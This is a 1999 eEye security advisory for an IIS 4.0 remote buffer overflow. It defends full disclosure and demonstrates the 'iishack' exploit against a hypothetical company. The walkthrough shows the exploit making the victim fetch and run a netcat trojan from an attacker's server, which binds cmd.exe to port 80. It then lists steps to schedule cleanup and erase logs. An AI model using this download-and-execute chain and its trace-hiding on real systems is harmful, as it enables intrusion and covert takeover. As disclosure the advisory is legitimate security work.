    DOCUMENT TAKEN AS IS FROM eEye.com WEB SITE - NOTHING HAS BEEN CHANGED



                     Retina vs. IIS4, Round 2 - The Exploit


Note: Now that we have proven the severity of this advisory we no longer feel
that it is necessary to distribute the exploit in a  binary form. However the
source code is still available for download.


  We contemplated releasing this exploit and decided to do it after Microsoft
neglected to give it the attention it deserves. After the fifth day of reporting
the bug to Microsoft, they stopped responding to our eMails. On the 8th day we
felt that it was our duty to make our voice heard.


 Here Is Why.                                           
We are a full disclosure security team, and we were not working under any non
disclosure agreements with anyone. Our responsibility to our clients and the
whole network community is to disclose as many details as possible, this is how
other developers can pick up where we stopped and explore the exploit in different
directions, this is the way we can contribute to the security community and keep
software vendors working hard at producing more robust products. This exploit
demonstrates the seriousness of the hole, YES this is a very serious hole and
needs to be given the attention it deserves. If our team starts hiding the facts,
we'll be no better than a software vendor that rushes insecure products to market.
So here it goes...

 The Target:

Lets say for this example we are targeting some random fortune 500 company. Take
your pick. We want to pretend this company has some "state of the art" security.
They are locked down behind a Cisco Pix, and are being watched with the best of
Intrusion Detection software. The server only allows inbound connections to port
80.

 Let's Dance.

We've crafted our exploit to overflow the remote machine and download and execute
a trojan from our web server. The trojan we are using for this example is,
ncx.exe. Ncx.exe is a hacked up version of netcat.exe. The hacked up part of this
netcat is that it always passes -l -p 80 -t -e cmd.exe as its argument. That
basically means netcat is always going to bind cmd.exe to port 80. The exe has
also been packed slightly to make it smaller. Instead of a 50k footprint its 31k.
So we run our exploit:


   X:\Code>iishack example.com 80 ourserver.com/ncx.exe
   ------(IIS 4.0 remote buffer overflow exploit)-----------------
   (c) dark spyrit -- barns@eeye.com.
   http://www.eEye.com

   [usage: iishack <host> <port> <url> ]
   eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe
   do not include 'http://' before hosts!
   ---------------------------------------------------------------

   Data sent!

   Note: Give it enough time to download your trojan.

   X:\Code>telnet example.com 80

   Microsoft(R) Windows NT(TM)
   (C) Copyright 1985-1996 Microsoft Corp.

   C:\>[You have full access to the system, happy browsing :)]
   C:\>[Add a scheduled task to restart inetinfo in X minutes]
   C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]
   C:\>[Clean up any trace or logs we might have left behind.]
   C:\>exit

Note: Once we type exit in the telnet session our trojan exe, ncx.exe is unloaded
and is no longer listening on port 80. Therefore the web service can restart and
everything can seem back to normal. Now the example above was a some what quick
demonstration of how this could be used. Some things were left out because this
advisory is big enough as it is.

  Special Thanks

Goes to professor barns@eeye.com for coding this exploit and demonstrating his
Kung Fu style.

Copyright (c) 1999 eEye Digital Security Team

Permission is hereby granted for the redistribution of this alert electronically.
It is not to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium excluding
electronic medium, please e-mail alert@eEye.com for permission.

  Disclaimer:

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are NO
warranties with regard to this information. In no event shall the author be liable
for any damages whatsoever arising out of or in connection with the use or spread
of this information. Any use of this information is at the user's own risk.

Please send suggestions, updates, and comments to:

  eEye Digital Security Team

   info@eEye.com
   www.eEye.com



             Copyright  1998-1999 eEye.com - All Rights Reserved. eEye
                          is an [www.eCompany.com] Venture.


